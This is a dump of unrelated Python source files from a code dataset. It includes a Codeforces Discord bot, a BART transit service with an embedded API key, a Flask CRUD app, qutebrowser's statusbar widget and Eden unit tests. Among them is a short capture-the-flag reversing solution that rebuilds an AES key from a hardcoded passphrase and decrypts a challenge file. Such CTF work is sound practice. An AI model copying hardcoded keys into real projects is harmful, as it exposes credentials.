problem['name']\n rating = problem['rating']\n recommendations.pop((name, rating), None)\n\n if not recommendations:\n await ctx.send('{} is already too gud'.format(handle))\n else:\n name, rating = random.choice(list(recommendations.keys()))\n contestid, index = recommendations[(name, rating)]\n # 'from' and 'count' are for ranklist, query minimum allowed (1) since we do not need it\n contestresp = await cf.contest.standings(contestid=contestid, from_=1, count=1)\n contestname = contestresp['contest']['name']\n title = f'{index}. {name}'\n url = f'{cf.CONTEST_BASE_URL}{contestid}/problem/{index}'\n desc = f'{contestname}\\nRating: {rating}'\n await ctx.send(\n f'Recommended problem for `{handle}`', embed=discord.Embed(title=title, url=url, description=desc))\n\n @commands.command(brief='Compare epeens.')\n async def rating(self, ctx, *handles: str):\n \"\"\"Compare epeens.\"\"\"\n if not handles or len(handles) > 5:\n await ctx.send('Number of handles must be between 1 and 5')\n return\n\n plt.clf()\n rate = []\n for handle in handles:\n try:\n contests = await cf.user.rating(handle=handle)\n except aiohttp.ClientConnectionError:\n await ctx.send('Error connecting to Codeforces API')\n return\n except cf.NotFoundError:\n await ctx.send(f'Handle not found: `{handle}`')\n return\n except cf.CodeforcesApiError:\n await ctx.send('Codeforces API denied the request, please make sure handles are valid.')\n return\n\n ratings = []\n times = []\n for contest in contests:\n ratings.append(contest['newRating'])\n times.append(datetime.datetime.fromtimestamp(contest['ratingUpdateTimeSeconds']))\n plt.plot(\n times, ratings, linestyle='-', marker='o', markersize=3, markerfacecolor='white', markeredgewidth=0.5)\n rate.append(ratings[-1])\n\n ymin, ymax = plt.gca().get_ylim()\n colors = [('#AA0000', 3000, 4000), ('#FF3333', 2600, 3000), ('#FF7777', 2400, 2600), ('#FFBB55', 2300, 2400),\n ('#FFCC88', 2100, 2300), ('#FF88FF', 1900, 2100), ('#AAAAFF', 1600, 1900), ('#77DDBB', 1400, 1600),\n ('#77FF77', 1200, 1400), ('#CCCCCC', 0, 1200)]\n\n for color, lo, hi in colors:\n plt.axhspan(lo, hi, facecolor=color)\n plt.ylim(ymin, ymax)\n plt.gcf().autofmt_xdate()\n locs, labels = plt.xticks()\n for loc in locs:\n plt.axvspan(loc, loc, facecolor='white')\n\n zero_width_space = '\\u200b'\n labels = [f'{zero_width_space}{handle} ({rating})' for handle, rating in zip(handles, rate)]\n plt.legend(labels)\n discord_file = self.get_current_figure_as_file()\n await ctx.send(file=discord_file)\n\n @commands.command(brief='Show histogram of solved problems on CF.')\n async def solved(self, ctx, *handles: str):\n \"\"\"Shows a histogram of problems solved on Codeforces for the handles provided.\"\"\"\n if not handles or len(handles) > 5:\n await ctx.send('Number of handles must be between 1 and 5')\n return\n\n allratings = []\n\n for handle in handles:\n try:\n submissions = await cf.user.status(handle=handle)\n except aiohttp.ClientConnectionError:\n await ctx.send('Error connecting to Codeforces API')\n return\n except cf.NotFoundError:\n await ctx.send(f'Handle not found: `{handle}`')\n return\n except cf.CodeforcesApiError:\n await ctx.send('Codeforces API denied the request, please make sure handles are valid.')\n return\n\n problems = set()\n for submission in submissions:\n if submission['verdict'] == 'OK':\n problem = submission['problem']\n # CF problems don't have IDs! Just hope (name, rating) pairs don't clash?\n name = problem['name']\n rating = problem.get('rating')\n if rating:\n problems.add((name, rating))\n\n ratings = [rating for name, rating in problems]\n allratings.append(ratings)\n\n # Adjust bin size so it looks nice\n step = 100 if len(handles) == 1 else 200\n histbins = list(range(500, 3800 + step, step))\n\n # matplotlib ignores labels that begin with _\n # https://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.legend\n # Add zero-width space to work around this\n zero_width_space = '\\u200b'\n labels = [f'{zero_width_space}{handle}: {len(ratings)}' for handle, ratings in zip(handles, allratings)]\n\n plt.clf()\n plt.hist(allratings, bins=histbins, label=labels)\n plt.title('Histogram of problems solved on Codeforces')\n plt.xlabel('Problem rating')\n plt.ylabel('Number solved')\n plt.legend(loc='upper right')\n discord_file = self.get_current_figure_as_file()\n await ctx.send(file=discord_file)\n\n @staticmethod\n def get_current_figure_as_file():\n filename = f'tempplot_{time.time()}.png'\n plt.savefig(filename, facecolor=plt.gca().get_facecolor(), bbox_inches='tight', pad_inches=0.25)\n with open(filename, 'rb') as file:\n discord_file = discord.File(io.BytesIO(file.read()), filename='plot.png')\n os.remove(filename)\n return discord_file\n\n\ndef setup(bot):\n bot.add_cog(Codeforces(bot))\n","sub_path":"tle/cogs/codeforces.py","file_name":"codeforces.py","file_ext":"py","file_size_in_byte":8005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"68602133","text":"#!/usr/bin/env python3\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto.Protocol import KDF\n\ncipher = base64.b64decode(open(\"./enc\").read())\n\nderived = KDF.PBKDF2(b\"A_Wise_Man_Once_Told_Me_Obfuscation_Is_Useless_Anyway\", b'Ivan Medvedev', 48)\nprint(len(derived))\nkey = derived[:32]\niv = derived[32:48]\naes = AES.new(key, AES.MODE_CBC, iv=iv)\nprint(aes.decrypt(cipher).decode(\"utf-16\"))\n","sub_path":"reme1/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"48533479","text":"import asyncio\n\nfrom autobahn.asyncio import wamp\nimport bart_api\n\nSTATION_CHOICES = (\n (\"12TH\", \"12th St. Oakland City Center\"),\n (\"16TH\", \"16th St. Mission\"),\n (\"19TH\", \"19th St. Oakland\"),\n (\"24TH\", \"24th St. Mission\"),\n (\"ASHB\", \"Ashby\"),\n (\"BALB\", \"Balboa Park\"),\n (\"BAYF\", \"Bay Fair\"),\n (\"CAST\", \"Castro Valley\"),\n (\"CIVC\", \"Civic Center/UN Plaza\"),\n (\"COLS\", \"Coliseum/Oakland Airport\"),\n (\"COLM\", \"Colma\"),\n (\"CONC\", \"Concord\"),\n (\"DALY\", \"Daly City\"),\n (\"DBRK\", \"Downtown Berkeley\"),\n (\"DUBL\", \"Dublin/Pleasanton\"),\n (\"DELN\", \"El Cerrito del Norte\"),\n (\"PLZA\", \"El Cerrito Plaza\"),\n (\"EMBR\", \"Embarcadero\"),\n (\"FRMT\", \"Fremont\"),\n (\"FTVL\", \"Fruitvale\"),\n (\"GLEN\", \"Glen Park\"),\n (\"HAYW\", \"Hayward\"),\n (\"LAFY\", \"Lafayette\"),\n (\"LAKE\", \"Lake Merritt\"),\n (\"MCAR\", \"MacArthur\"),\n (\"MLBR\", \"Millbrae\"),\n (\"MONT\", \"Montgomery St.\"),\n (\"NBRK\", \"North Berkeley\"),\n (\"NCON\", \"North Concord/Martinez\"),\n (\"ORIN\", \"Orinda\"),\n (\"PITT\", \"Pittsburg/Bay Point\"),\n (\"PHIL\", \"Pleasant Hill/Contra Costa Centre\"),\n (\"POWL\", \"Powell St.\"),\n (\"RICH\", \"Richmond\"),\n (\"ROCK\", \"Rockridge\"),\n (\"SBRN\", \"San Bruno\"),\n (\"SFIA\", \"San Francisco Int'l Airport\"),\n (\"SANL\", \"San Leandro\"),\n (\"SHAY\", \"South Hayward\"),\n (\"SSAN\", \"South San Francisco\"),\n (\"UCTY\", \"Union City\"),\n (\"WCRK\", \"Walnut Creek\"),\n (\"WDUB\", \"West Dublin/Pleasanton\"),\n (\"WOAK\", \"West Oakland\"),\n)\n\nDIRECTION_CHOICES = (\n (\"n\", \"North\"),\n (\"s\", \"South\")\n)\n\n\nclass BartService(wamp.ApplicationSession):\n def __init__(self, *args, **kwargs):\n super(BartService, self).__init__(self, *args, **kwargs)\n self.api = bart_api.BartApi('QXLL-UGSD-IJSQ-DT35')\n self.stops = []\n\n def get_routes(self, stop):\n routes = self.api.etd(stop)\n ret = []\n for route in routes:\n r = {}\n for child in route.getchildren():\n if child.tag == 'estimate':\n r['estimate'] = {}\n estimate = child.getchildren()\n for elem in estimate:\n if elem.tag not in r['estimate']:\n r['estimate'][elem.tag] = elem.text\n else:\n r[child.tag] = child.text\n ret.append(r)\n return ret\n\n def _get_stop_name(self, stop_name):\n return stop_name\n\n def onConnect(self):\n self.join(u\"realm1\")\n\n @asyncio.coroutine\n def onJoin(self, details):\n # register a procedure for remote calling\n def add_stop(stop_name):\n print(\"Adding Bart Stop: {}\".format(stop_name))\n self.stops.append(self._get_stop_name(stop_name))\n self.get_routes(stop_name)\n return\n print('test')\n reg = yield from self.register(add_stop, u'com.bartservice.add_stop')\n print(\"Registered procedure with ID {}\".format(reg.id))\n\n # publish events to a topic\n while True:\n routes = {}\n for route in self.stops:\n routes[route] = self.get_routes(route)\n self.publish(u'com.myapp.topic1', routes)\n print(\"Published event.\")\n yield from asyncio.sleep(5)\n","sub_path":"services/bart_service.py","file_name":"bart_service.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"320884859","text":"from itertools import permutations \nimport logging\n\nclass Graph(object):\n def __init__(self,nodos,lados):\n for lado in lados:\n for nodo in lado:\n assert nodo in nodos ,\\\n 'El lado debe ser un lado valido'\n self.nodos = nodos\n self.lados = lados\n\n def AdjacencyMatrix(self):\n MatrizDeAdjacencia = []\n for nodoA in self.nodos:\n temp = []\n for nodoB in self.nodos:\n if((nodoA,nodoB) in self.lados or (nodoB,nodoA) in self.lados):\n temp.append(1)\n else:\n temp.append(0)\n MatrizDeAdjacencia.append(temp)\n return MatrizDeAdjacencia\n\n def IsIsomorphTo(self,grafo):\n contador = 0\n if(len(self.nodos)==len(grafo.nodos) and len(self.lados) == len(grafo.lados)):\n for i in self.AdjacencyMatrix():\n permutaciones = []\n for p in permutations(i):\n permutaciones.append(p)\n if(not(tuple(grafo.AdjacencyMatrix()[contador]) in permutaciones)):\n return False\n else:\n contador = contador + 1\n return True\n else:\n return False\n \n \n \n","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"80563881","text":"from flask import Flask, jsonify, request\nimport util\napp = Flask(__name__)\nimport disciplina\n\n\n@app.route('/')\ndef all():\n return jsonify(database)\n\n@app.route('/reseta', methods=['POST'])\ndef reseta():\n util.reseta()\n return 'banco resetado'\n \n\n@app.route('/alunos', methods=['GET'])\ndef alunos():\n return jsonify(util.all_for_database('ALUNO'))\n\n\n\n@app.route('/alunos/', methods=['GET'])\ndef get_aluno(id_aluno):\n try: \n aluno = util.localiza(id_aluno,'ALUNO')\n return jsonify(aluno)\n except util.NotFoundError:\n return jsonify({'erro':'aluno nao encontrado'}),400\n\n@app.route('/alunos/', methods=['DELETE'])\ndef deleta_aluno(id_aluno):\n try: \n aluno = util.localiza(id_aluno,'ALUNO')\n removido = util.remove(aluno,'ALUNO')\n return jsonify(removido)\n except util.NotFoundError:\n return jsonify({'erro':'aluno nao encontrado'}),400\n\n@app.route('/alunos/', methods=['PUT'])\ndef edita_aluno(id_aluno):\n try: \n aluno = util.localiza(id_aluno,'ALUNO')\n novo_aluno = request.json\n if 'nome' not in novo_aluno:\n return jsonify({'erro':'aluno sem nome'}),400\n for key in aluno:\n if key in novo_aluno:\n aluno[key] = novo_aluno[key]\n return jsonify(aluno)\n except util.NotFoundError:\n return jsonify({'erro':'aluno nao encontrado'}),400\n\n@app.route('/alunos', methods=['POST'])\ndef novo_aluno():\n print('ola')\n novo_aluno = request.json\n print(request.method)\n if 'nome' not in novo_aluno:\n return jsonify({'erro':'aluno sem nome'}),400\n if 'id' not in novo_aluno:\n return jsonify({'erro':'aluno sem id'}),400\n try:\n aluno = util.localiza(novo_aluno['id'],'ALUNO')\n return jsonify({'erro':'id ja utilizada'}),400\n except util.NotFoundError:\n pass\n\n util.adiciona(novo_aluno,'ALUNO')\n return jsonify(util.all_for_database('ALUNO'))\n\n\n@app.route('/professores')\ndef professores():\n return jsonify(util.all_for_database('PROFESSOR'))\n\n\ndef localiza_professor(id_professor):\n for professor in database['PROFESSOR']:\n if professor['id'] == id_professor:\n return professor\n raise util.NotFoundError\n\n@app.route('/professores/', methods=['GET'])\ndef get_professor(id_professor):\n try: \n professor = util.localiza(id_professor,'PROFESSOR')\n if request.method == 'PUT':\n novo_professor = request.json\n if 'nome' not in novo_professor:\n return jsonify({'erro':'professor sem nome'}),400\n for key in professor:\n if key in novo_professor:\n professor[key] = novo_professor[key]\n if request.method == 'DELETE':\n database['PROFESSOR'].remove(professor)\n dic = {}\n dic['removido'] = True\n dic['professor'] = professor\n return jsonify(dic)\n\n return jsonify(professor)\n except util.NotFoundError:\n return jsonify({'erro':'professor nao encontrado'}),400\n\n@app.route('/professores/', methods=['PUT'])\ndef edita_professor(id_professor):\n try: \n professor = util.localiza(id_professor,'PROFESSOR')\n novo_professor = request.json\n if 'nome' not in novo_professor:\n return jsonify({'erro':'professor sem nome'}),400\n for key in professor:\n if key in novo_professor:\n professor[key] = novo_professor[key]\n return jsonify(professor)\n except util.NotFoundError:\n return jsonify({'erro':'professor nao encontrado'}),400\n\n@app.route('/professores/', methods=['DELETE'])\ndef deleta_professor(id_professor):\n try: \n professor = util.localiza(id_professor,'PROFESSOR')\n deletado = util.remove(professor,'PROFESSOR')\n return jsonify(deletado)\n except util.NotFoundError:\n return jsonify({'erro':'professor nao encontrado'}),400\n\n@app.route('/professores', methods=['POST'])\ndef novo_professor():\n novo_professor = request.json\n print(request.method)\n if 'nome' not in novo_professor:\n return jsonify({'erro':'professor sem nome'}),400\n if 'id' not in novo_professor:\n return jsonify({'erro':'professor sem id'}),400\n try:\n professor = util.localiza(novo_professor['id'],'PROFESSOR')\n return jsonify({'erro':'id ja utilizada'}),400\n except util.NotFoundError:\n pass\n util.adiciona(novo_professor,'PROFESSOR')\n return jsonify(util.all_for_database('PROFESSOR'))\n\n\nif __name__ == '__main__':\n app.run(host='localhost', port=5002, debug=True)\n\n\n","sub_path":"DESENVOLVIMENTO DE APLICAÇÕES DISTRIBUIDAS/Sala_aula_AC8/Luis_Felipe_Simoes/sala_aula_gabarito.py","file_name":"sala_aula_gabarito.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"217234667","text":"# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:\n\n# Copyright 2014 Florian Bruhin (The Compiler) \n#\n# This file is part of qutebrowser.\n#\n# qutebrowser is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# qutebrowser is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with qutebrowser. If not, see .\n\n\"\"\"The main statusbar widget.\"\"\"\n\nimport collections\n\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, pyqtProperty, Qt, QTime, QSize\nfrom PyQt5.QtWidgets import QWidget, QHBoxLayout, QStackedLayout, QSizePolicy\n\nfrom qutebrowser.config import config, style\nfrom qutebrowser.utils import usertypes, log, objreg, utils\nfrom qutebrowser.mainwindow.statusbar import (command, progress, keystring,\n percentage, url, prompt)\nfrom qutebrowser.mainwindow.statusbar import text as textwidget\n\n\nPreviousWidget = usertypes.enum('PreviousWidget', ['none', 'prompt',\n 'command'])\n\n\nclass StatusBar(QWidget):\n\n \"\"\"The statusbar at the bottom of the mainwindow.\n\n Attributes:\n txt: The Text widget in the statusbar.\n keystring: The KeyString widget in the statusbar.\n percentage: The Percentage widget in the statusbar.\n url: The UrlText widget in the statusbar.\n prog: The Progress widget in the statusbar.\n cmd: The Command widget in the statusbar.\n _hbox: The main QHBoxLayout.\n _stack: The QStackedLayout with cmd/txt widgets.\n _text_queue: A deque of (error, text) tuples to be displayed.\n error: True if message is an error, False otherwise\n _text_pop_timer: A Timer displaying the error messages.\n _stopwatch: A QTime for the last displayed message.\n _timer_was_active: Whether the _text_pop_timer was active before hiding\n the command widget.\n _previous_widget: A PreviousWidget member - the widget which was\n displayed when an error interrupted it.\n _win_id: The window ID the statusbar is associated with.\n\n Class attributes:\n _error: If there currently is an error, accessed through the error\n property.\n\n For some reason we need to have this as class attribute so\n pyqtProperty works correctly.\n\n _prompt_active: If we're currently in prompt-mode.\n\n For some reason we need to have this as class attribute\n so pyqtProperty works correctly.\n\n _insert_active: If we're currently in insert mode.\n\n For some reason we need to have this as class attribute\n so pyqtProperty works correctly.\n\n Signals:\n resized: Emitted when the statusbar has resized, so the completion\n widget can adjust its size to it.\n arg: The new size.\n moved: Emitted when the statusbar has moved, so the completion widget\n can move the the right position.\n arg: The new position.\n \"\"\"\n\n resized = pyqtSignal('QRect')\n moved = pyqtSignal('QPoint')\n _error = False\n _prompt_active = False\n _insert_active = False\n\n STYLESHEET = \"\"\"\n QWidget#StatusBar {\n {{ color['statusbar.bg'] }}\n }\n\n QWidget#StatusBar[insert_active=\"true\"] {\n {{ color['statusbar.bg.insert'] }}\n }\n\n QWidget#StatusBar[prompt_active=\"true\"] {\n {{ color['statusbar.bg.prompt'] }}\n }\n\n QWidget#StatusBar[error=\"true\"] {\n {{ color['statusbar.bg.error'] }}\n }\n\n QLabel, QLineEdit {\n {{ color['statusbar.fg'] }}\n {{ font['statusbar'] }}\n }\n \"\"\"\n\n def __init__(self, win_id, parent=None):\n super().__init__(parent)\n objreg.register('statusbar', self, scope='window', window=win_id)\n self.setObjectName(self.__class__.__name__)\n self.setAttribute(Qt.WA_StyledBackground)\n style.set_register_stylesheet(self)\n\n self.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Fixed)\n\n self._win_id = win_id\n self._option = None\n self._stopwatch = QTime()\n\n self._hbox = QHBoxLayout(self)\n self._hbox.setContentsMargins(0, 0, 0, 0)\n self._hbox.setSpacing(5)\n\n self._stack = QStackedLayout()\n self._hbox.addLayout(self._stack)\n self._stack.setContentsMargins(0, 0, 0, 0)\n\n self.cmd = command.Command(win_id)\n self._stack.addWidget(self.cmd)\n objreg.register('status-command', self.cmd, scope='window',\n window=win_id)\n\n self.txt = textwidget.Text()\n self._stack.addWidget(self.txt)\n self._timer_was_active = False\n self._text_queue = collections.deque()\n self._text_pop_timer = usertypes.Timer(self, 'statusbar_text_pop')\n self._text_pop_timer.timeout.connect(self._pop_text)\n self.set_pop_timer_interval()\n objreg.get('config').changed.connect(self.set_pop_timer_interval)\n\n self.prompt = prompt.Prompt(win_id)\n self._stack.addWidget(self.prompt)\n self._previous_widget = PreviousWidget.none\n\n self.cmd.show_cmd.connect(self._show_cmd_widget)\n self.cmd.hide_cmd.connect(self._hide_cmd_widget)\n self._hide_cmd_widget()\n prompter = objreg.get('prompter', scope='window', window=self._win_id)\n prompter.show_prompt.connect(self._show_prompt_widget)\n prompter.hide_prompt.connect(self._hide_prompt_widget)\n self._hide_prompt_widget()\n\n self.keystring = keystring.KeyString()\n self._hbox.addWidget(self.keystring)\n\n self.url = url.UrlText()\n self._hbox.addWidget(self.url)\n\n self.percentage = percentage.Percentage()\n self._hbox.addWidget(self.percentage)\n\n # We add a parent to Progress here because it calls self.show() based\n # on some signals, and if that happens before it's added to the layout,\n # it will quickly blink up as independent window.\n self.prog = progress.Progress(self)\n self._hbox.addWidget(self.prog)\n\n def __repr__(self):\n return utils.get_repr(self)\n\n @pyqtProperty(bool)\n def error(self):\n \"\"\"Getter for self.error, so it can be used as Qt property.\"\"\"\n # pylint: disable=method-hidden\n return self._error\n\n def _set_error(self, val):\n \"\"\"Setter for self.error, so it can be used as Qt property.\n\n Re-set the stylesheet after setting the value, so everything gets\n updated by Qt properly.\n \"\"\"\n if self._error == val:\n # This gets called a lot (e.g. if the completion selection was\n # changed), and setStyleSheet is relatively expensive, so we ignore\n # this if there's nothing to change.\n return\n log.statusbar.debug(\"Setting error to {}\".format(val))\n self._error = val\n self.setStyleSheet(style.get_stylesheet(self.STYLESHEET))\n if val:\n # If we got an error while command/prompt was shown, raise the text\n # widget.\n self._stack.setCurrentWidget(self.txt)\n\n @pyqtProperty(bool)\n def prompt_active(self):\n \"\"\"Getter for self.prompt_active, so it can be used as Qt property.\"\"\"\n # pylint: disable=method-hidden\n return self._prompt_active\n\n def _set_prompt_active(self, val):\n \"\"\"Setter for self.prompt_active.\n\n Re-set the stylesheet after setting the value, so everything gets\n updated by Qt properly.\n \"\"\"\n log.statusbar.debug(\"Setting prompt_active to {}\".format(val))\n self._prompt_active = val\n self.setStyleSheet(style.get_stylesheet(self.STYLESHEET))\n\n @pyqtProperty(bool)\n def insert_active(self):\n \"\"\"Getter for self.insert_active, so it can be used as Qt property.\"\"\"\n # pylint: disable=method-hidden\n return self._insert_active\n\n def _set_insert_active(self, val):\n \"\"\"Setter for self.insert_active.\n\n Re-set the stylesheet after setting the value, so everything gets\n updated by Qt properly.\n \"\"\"\n log.statusbar.debug(\"Setting insert_active to {}\".format(val))\n self._insert_active = val\n self.setStyleSheet(style.get_stylesheet(self.STYLESHEET))\n\n def _set_mode_text(self, mode):\n \"\"\"Set the mode text.\"\"\"\n text = \"-- {} MODE --\".format(mode.upper())\n self.txt.set_text(self.txt.Text.normal, text)\n\n def _pop_text(self):\n \"\"\"Display a text in the statusbar and pop it from _text_queue.\"\"\"\n try:\n error, text = self._text_queue.popleft()\n except IndexError:\n self._set_error(False)\n self.txt.set_text(self.txt.Text.temp, '')\n self._text_pop_timer.stop()\n # If a previous widget was interrupted by an error, restore it.\n if self._previous_widget == PreviousWidget.prompt:\n self._stack.setCurrentWidget(self.prompt)\n elif self._previous_widget == PreviousWidget.command:\n self._stack.setCurrentWidget(self.command)\n elif self._previous_widget == PreviousWidget.none:\n pass\n else:\n raise AssertionError(\"Unknown _previous_widget!\")\n return\n log.statusbar.debug(\"Displaying {} message: {}\".format(\n 'error' if error else 'text', text))\n log.statusbar.debug(\"Remaining: {}\".format(self._text_queue))\n self._set_error(error)\n self.txt.set_text(self.txt.Text.temp, text)\n\n def _show_cmd_widget(self):\n \"\"\"Show command widget instead of temporary text.\"\"\"\n self._set_error(False)\n self._previous_widget = PreviousWidget.prompt\n if self._text_pop_timer.isActive():\n self._timer_was_active = True\n self._text_pop_timer.stop()\n self._stack.setCurrentWidget(self.cmd)\n\n def _hide_cmd_widget(self):\n \"\"\"Show temporary text instead of command widget.\"\"\"\n log.statusbar.debug(\"Hiding cmd widget, queue: {}\".format(\n self._text_queue))\n self._previous_widget = PreviousWidget.none\n if self._timer_was_active:\n # Restart the text pop timer if it was active before hiding.\n self._pop_text()\n self._text_pop_timer.start()\n self._timer_was_active = False\n self._stack.setCurrentWidget(self.txt)\n\n def _show_prompt_widget(self):\n \"\"\"Show prompt widget instead of temporary text.\"\"\"\n if self._stack.currentWidget() is self.prompt:\n return\n self._set_error(False)\n self._set_prompt_active(True)\n self._previous_widget = PreviousWidget.prompt\n if self._text_pop_timer.isActive():\n self._timer_was_active = True\n self._text_pop_timer.stop()\n self._stack.setCurrentWidget(self.prompt)\n\n def _hide_prompt_widget(self):\n \"\"\"Show temporary text instead of prompt widget.\"\"\"\n self._set_prompt_active(False)\n self._previous_widget = PreviousWidget.none\n log.statusbar.debug(\"Hiding prompt widget, queue: {}\".format(\n self._text_queue))\n if self._timer_was_active:\n # Restart the text pop timer if it was active before hiding.\n self._pop_text()\n self._text_pop_timer.start()\n self._timer_was_active = False\n self._stack.setCurrentWidget(self.txt)\n\n def _disp_text(self, text, error, immediately=False):\n \"\"\"Inner logic for disp_error and disp_temp_text.\n\n Args:\n text: The message to display.\n error: Whether it's an error message (True) or normal text (False)\n immediately: If set, message gets displayed immediately instead of\n queued.\n \"\"\"\n log.statusbar.debug(\"Displaying text: {} (error={})\".format(\n text, error))\n mindelta = config.get('ui', 'message-timeout')\n if self._stopwatch.isNull():\n delta = None\n self._stopwatch.start()\n else:\n delta = self._stopwatch.restart()\n log.statusbar.debug(\"queue: {} / delta: {}\".format(\n self._text_queue, delta))\n if not self._text_queue and (delta is None or delta > mindelta):\n # If the queue is empty and we didn't print messages for long\n # enough, we can take the short route and display the message\n # immediately. We then start the pop_timer only to restore the\n # normal state in 2 seconds.\n log.statusbar.debug(\"Displaying immediately\")\n self._set_error(error)\n self.txt.set_text(self.txt.Text.temp, text)\n self._text_pop_timer.start()\n elif self._text_queue and self._text_queue[-1] == (error, text):\n # If we get the same message multiple times in a row and we're\n # still displaying it *anyways* we ignore the new one\n log.statusbar.debug(\"ignoring\")\n elif immediately:\n # This message is a reaction to a keypress and should be displayed\n # immediately, temporarily interrupting the message queue.\n # We display this immediately and restart the timer.to clear it and\n # display the rest of the queue later.\n log.statusbar.debug(\"Moving to beginning of queue\")\n self._set_error(error)\n self.txt.set_text(self.txt.Text.temp, text)\n self._text_pop_timer.start()\n else:\n # There are still some messages to be displayed, so we queue this\n # up.\n log.statusbar.debug(\"queueing\")\n self._text_queue.append((error, text))\n self._text_pop_timer.start()\n\n @pyqtSlot(str, bool)\n def disp_error(self, text, immediately=False):\n \"\"\"Display an error in the statusbar.\n\n Args:\n text: The message to display.\n immediately: If set, message gets displayed immediately instead of\n queued.\n \"\"\"\n self._disp_text(text, True, immediately)\n\n @pyqtSlot(str, bool)\n def disp_temp_text(self, text, immediately):\n \"\"\"Display a temporary text in the statusbar.\n\n Args:\n text: The message to display.\n immediately: If set, message gets displayed immediately instead of\n queued.\n \"\"\"\n self._disp_text(text, False, immediately)\n\n @pyqtSlot(str)\n def set_text(self, val):\n \"\"\"Set a normal (persistent) text in the status bar.\"\"\"\n self.txt.set_text(self.txt.Text.normal, val)\n\n @pyqtSlot(usertypes.KeyMode)\n def on_mode_entered(self, mode):\n \"\"\"Mark certain modes in the commandline.\"\"\"\n mode_manager = objreg.get('mode-manager', scope='window',\n window=self._win_id)\n if mode in mode_manager.passthrough:\n self._set_mode_text(mode.name)\n if mode == usertypes.KeyMode.insert:\n self._set_insert_active(True)\n\n @pyqtSlot(usertypes.KeyMode, usertypes.KeyMode)\n def on_mode_left(self, old_mode, new_mode):\n \"\"\"Clear marked mode.\"\"\"\n mode_manager = objreg.get('mode-manager', scope='window',\n window=self._win_id)\n if old_mode in mode_manager.passthrough:\n if new_mode in mode_manager.passthrough:\n self._set_mode_text(new_mode.name)\n else:\n self.txt.set_text(self.txt.Text.normal, '')\n if old_mode == usertypes.KeyMode.insert:\n self._set_insert_active(False)\n\n @config.change_filter('ui', 'message-timeout')\n def set_pop_timer_interval(self):\n \"\"\"Update message timeout when config changed.\"\"\"\n self._text_pop_timer.setInterval(config.get('ui', 'message-timeout'))\n\n def resizeEvent(self, e):\n \"\"\"Extend resizeEvent of QWidget to emit a resized signal afterwards.\n\n Args:\n e: The QResizeEvent.\n \"\"\"\n super().resizeEvent(e)\n self.resized.emit(self.geometry())\n\n def moveEvent(self, e):\n \"\"\"Extend moveEvent of QWidget to emit a moved signal afterwards.\n\n Args:\n e: The QMoveEvent.\n \"\"\"\n super().moveEvent(e)\n self.moved.emit(e.pos())\n\n def minimumSizeHint(self):\n \"\"\"Set the minimum height to the text height plus some padding.\"\"\"\n width = super().minimumSizeHint().width()\n height = self.fontMetrics().height() + 3\n return QSize(width, height)\n","sub_path":"qutebrowser-git/pkg/qutebrowser-git/usr/lib/python3.4/site-packages/qutebrowser/mainwindow/statusbar/bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":17128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"139669958","text":"# Eden Unit Tests\n#\n# To run this script use:\n# python web2py.py -S eden -M -R applications/eden/modules/unit_tests/core/tools/convert.py\n#\nimport unittest\n\nfrom core import *\n\nfrom unit_tests import run_suite\n\n# =============================================================================\nclass TypeConverterTests(unittest.TestCase):\n \"\"\" Test S3TypeConverter \"\"\"\n\n # -------------------------------------------------------------------------\n def setUp(self):\n\n settings = current.deployment_settings\n\n # Make sure date+time formats are standard\n self.date_format = settings.get_L10n_date_format()\n self.time_format = settings.get_L10n_time_format()\n settings.L10n.date_format = \"%Y-%m-%d\"\n settings.L10n.time_format = \"%H:%M:%S\"\n\n # Set timezone to UTC\n self.tzinfo = current.response.s3.tzinfo\n current.response.s3.tzinfo = S3DefaultTZ(0)\n\n # Set calendar to Gregorian\n self.calendar = current.calendar\n current.calendar = S3Calendar(\"Gregorian\")\n\n # -------------------------------------------------------------------------\n def tearDown(self):\n\n settings = current.deployment_settings\n\n # Reset date and time format settings\n settings.L10n.date_format = self.date_format\n settings.L10n.time_format = self.time_format\n\n # Reset time zone\n current.response.s3.tzinfo = self.tzinfo\n\n # Restore current calendar\n current.calendar = self.calendar\n\n # -------------------------------------------------------------------------\n def testDate(self):\n \"\"\" Test date conversion \"\"\"\n\n assertEqual = self.assertEqual\n settings = current.deployment_settings\n response = current.response\n\n convert = S3TypeConverter._date\n\n # Set custom format\n settings.L10n.date_format = \"%d.%m.%Y\"\n\n # Verify that ISO format always works\n result = convert(\"2011-10-01\")\n assertEqual(result, datetime.date(2011, 10, 1))\n\n # Verify that local format always works\n result = convert(\"01.10.2011\")\n assertEqual(result, datetime.date(2011, 10, 1))\n\n # Verify without offset\n response.s3.tzinfo = S3DefaultTZ(0)\n result = convert(\"2011-10-01\")\n assertEqual(result, datetime.date(2011, 10, 1))\n\n # Verify with offset\n # => Date without time part means 08:00 local time zone,\n # so 2 hours East means the same day UTC, 06:00\n response.s3.tzinfo = S3DefaultTZ(+2)\n result = convert(\"2011-10-01\")\n assertEqual(result, datetime.date(2011, 10, 1))\n result = convert(\"01.05.2015\")\n assertEqual(result, datetime.date(2015, 5, 1))\n\n # Cross into the next day\n # => Date without time part means 08:00 local time zone,\n # so 11 hours East means previous day 